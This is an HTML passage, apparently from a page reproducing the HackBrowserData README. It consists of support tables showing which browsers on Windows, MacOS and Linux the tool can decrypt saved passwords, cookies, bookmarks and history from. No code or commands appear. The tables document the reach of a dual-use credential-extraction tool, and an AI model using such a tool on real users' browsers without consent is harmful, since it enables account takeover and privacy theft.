<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Google Chrome Beta</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Chromium</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Microsoft Edge</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">360 Speed</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">QQ</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Brave</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Opera</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">OperaGX</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Vivaldi</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Yandex</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">CocCoc</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Firefox</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Firefox Beta</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Firefox Dev</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Firefox ESR</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Firefox Nightly</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Internet Explorer</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/274c.png" alt="❌" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/274c.png" alt="❌" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/274c.png" alt="❌" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/274c.png" alt="❌" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
</tbody>
</table>
<h2 dir="auto"><a id="user-content-macos" class="anchor" href="https://github.com/moonD4rk/HackBrowserData#macos" target="_blank" rel="nofollow noopener" aria-hidden="true"></a><strong>MacOS</strong></h2>
<p dir="auto">Based on Apple&#8217;s security policy, some browsers <strong>require a current user password</strong> to decrypt.</p>
<table border="1">
<thead>
<tr>
<th align="left"><strong>Browser</strong></th>
<th align="center"><strong>Password</strong></th>
<th align="center"><strong>Cookie</strong></th>
<th align="center"><strong>Bookmark</strong></th>
<th align="center"><strong>History</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">Google Chrome</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Google Chrome Beta</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Chromium</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Microsoft Edge</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Brave</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Opera</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">OperaGX</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Vivaldi</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Yandex</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">CocCoc</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Firefox</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Firefox Beta</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Firefox Dev</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Firefox ESR</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Firefox Nightly</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Safari</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/274c.png" alt="❌" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/274c.png" alt="❌" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/274c.png" alt="❌" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/274c.png" alt="❌" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
</tbody>
</table>
<h2 dir="auto"><a id="user-content-linux" class="anchor" href="https://github.com/moonD4rk/HackBrowserData#linux" target="_blank" rel="nofollow noopener" aria-hidden="true"></a><strong>Linux</strong></h2>
<table border="1">
<thead>
<tr>
<th align="left">Browser</th>
<th align="center">Password</th>
<th align="center">Cookie</th>
<th align="center">Bookmark</th>
<th align="center">History</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">Google Chrome</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Google Chrome Beta</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Chromium</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Microsoft Edge Dev</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Brave</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Opera</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Vivaldi</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Firefox</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Firefox Beta</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Firefox Dev</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
